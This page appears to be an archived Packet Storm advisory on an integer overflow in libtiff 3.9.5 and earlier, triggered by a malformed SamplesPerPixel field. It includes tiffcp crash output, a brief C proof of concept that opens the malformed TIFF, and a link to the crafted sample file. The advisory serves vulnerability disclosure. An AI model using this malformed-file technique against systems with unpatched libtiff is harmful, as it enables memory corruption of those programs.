what you don't know can hurt you

libtiff 3.9.5 Integer Overflow

libtiff 3.9.5 Integer Overflow
Posted Aug 26, 2013
Authored by x90c

libtiff versions 3.9.5 and below suffer from an integer overflow vulnerability.

tags | exploit, overflow
MD5 | 5547542f6a8434023ce8e192027866dd

libtiff 3.9.5 Integer Overflow

Change Mirror Download
+----------------------------------------------------+
| XADV-2013001 libtiff <= 3.9.5 integer overflow bug |
+----------------------------------------------------+

vulnerable versions:
- libtiff 3.9.5 <=
- libtiff 3.6.0

not vulnerable versions:
- libtiff 4.0.3
- libtiff 4.0.2
- libtiff 4.0.1
- libtiff 4.0.0

release path:
4.0.3(latest) -> 4.0.2 -> 4.0.1 -> 4.0.0(patched)
-> 3.9.5(vulnerable)

testbed: linux distro
type: local
impact: medium
vendor: http://www.remotesensing.org/libtiff
author: x90c
site: x90c.org
email: geinblues@gmail.com

==========
abstract:
==========

I discovered libtiff TIFFOpen integer overflow bug
by weird TIFFOpen call success with malformed tif
image file!

- tiffcp tool (tiffinfo, tiff2ps, ... also can test):
Many times tiffcp execution ... often, it entered to
tiffcp function in tiffcp tool after tiffopen. Often
calling openSrcImage success. malformed tif image
within count of SamplePerPixel or RowsPerStrip can be
opened by TIFFOpen even though can't tiffcp, TIFFWrite
Directory with the returned TIFF*

- integer overflow to heap corruption:
Malformed tif image file within SamplePerPixel
and RowsPerStrip can be opened the malformed tif
data. and can be calculated in other library
functions it leads to integer overflow to memory
corruption!

- exploitation:
Exploit tries many times to call TIFFOpen with
malformed tif file. sometimes after, the target program
used vulnerable libtiff can be corrupted if these two
field will passed validation checks


=========
details:
=========

tiff-v3.6.0/tools/tiffcp

Many times TIFFOpen calls
----
..
[root@centos5 tools]# export SAMPLE=/home/x90c/sample_spp.tif
[root@centos5 tools]# ./tiffcp -b $SAMPLE
/home/x90c/sample.tif: Integer overflow in TIFFVStripSize.
TIFFReadDirectory: /home/x90c/sample.tif: cannot handle zero strip size.
[root@centos5 tools]# ./tiffcp -b $SAMPLE
/home/x90c/sample.tif: Integer overflow in TIFFVStripSize.
TIFFReadDirectory: /home/x90c/sample.tif: cannot handle zero strip size.
[root@centos5 tools]# ./tiffcp -b $SAMPLE
/home/x90c/sample.tif: Integer overflow in TIFFVStripSize.
TIFFReadDirectory: /home/x90c/sample.tif: cannot handle zero strip size.
[root@centos5 tools]# ./tiffcp -b $SAMPLE
samples=1392 imagewidth=2464 rowsperstrip=3248 // debug output
Bias image must be monochrome
[root@centos5 tools]#
----
As you see, malformed td_samplesperpixel(sampleperpixel
field of tif image) count of 2 changes these values 1,0
to a value of sample= of 1392(0x570). the invalid value
can be calculated and integer overflow!


===============
exploit codes:
===============

tiff_poc.c
--
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include "tiffio.h"

int tiff_integer_overflow_test(){
TIFF* tif = TIFFOpen("/home/x90c/sample_spp.tif", "r");
int samples = 0;

/*
* for instance, TIFFGetField library function will
* called with malicious samplesperpixel field value
* TIFFGetField got segfault!
*/
TIFFGetField(tif, TIFFTAG_SAMPLESPERPIXEL, &samples);

printf("tiff_poc: tif samplesperpixel field=%d\n", samples);
}
--

- I attached the sample_spp.tif:
http://www.x90c.org/exploits/sample_spp.tif


=============
patch codes:
=============

tiff-4.0.3/tools/tiffcp (latest version)

----
TIFFFetchNormalTag: Incorrect count for "SamplesPerPixel".
[root@centos5 tools]# ./tiffcp $SAMPLE tc1.tif
TIFFFetchNormalTag: Incorrect count for "SamplesPerPixel".
[root@centos5 tools]# ./tiffcp $SAMPLE tc1.tif
TIFFFetchNormalTag: Incorrect count for "SamplesPerPixel".
[root@centos5 tools]# ./tiffcp $SAMPLE tc1.tif
TIFFFetchNormalTag: Incorrect count for "SamplesPerPixel".
[root@centos5 tools]# ./tiffcp $SAMPLE tc1.tif
TIFFFetchNormalTag: Incorrect count for "SamplesPerPixel".
[root@centos5 tools]# ./tiffcp $SAMPLE tc1.tif
TIFFFetchNormalTag: Incorrect count for "SamplesPerPixel".
[root@centos5 tools]# ./tiffcp $SAMPLE tc1.tif
TIFFFetchNormalTag: Incorrect count for "SamplesPerPixel".
[root@centos5 tools]# ./tiffcp $SAMPLE tc1.tif
TIFFFetchNormalTag: Incorrect count for "SamplesPerPixel".
[root@centos5 tools]# ./tiffcp $SAMPLE tc1.tif
TIFFFetchNormalTag: Incorrect count for "SamplesPerPixel".
[root@centos5 tools]#
....
..
...
..
----
safe!


==============
vendor status:
==============
2013/08/24 - I discovered the security bug
2013/08/24 - the advisory released

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

February 2015

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    2 Files
  • 2
    Feb 2nd
    17 Files
  • 3
    Feb 3rd
    15 Files
  • 4
    Feb 4th
    16 Files
  • 5
    Feb 5th
    14 Files
  • 6
    Feb 6th
    4 Files
  • 7
    Feb 7th
    0 Files
  • 8
    Feb 8th
    0 Files
  • 9
    Feb 9th
    0 Files
  • 10
    Feb 10th
    0 Files
  • 11
    Feb 11th
    0 Files
  • 12
    Feb 12th
    0 Files
  • 13
    Feb 13th
    0 Files
  • 14
    Feb 14th
    0 Files
  • 15
    Feb 15th
    0 Files
  • 16
    Feb 16th
    0 Files
  • 17
    Feb 17th
    0 Files
  • 18
    Feb 18th
    0 Files
  • 19
    Feb 19th
    0 Files
  • 20
    Feb 20th
    0 Files
  • 21
    Feb 21st
    0 Files
  • 22
    Feb 22nd
    0 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    0 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2015 Packet Storm. All rights reserved.

close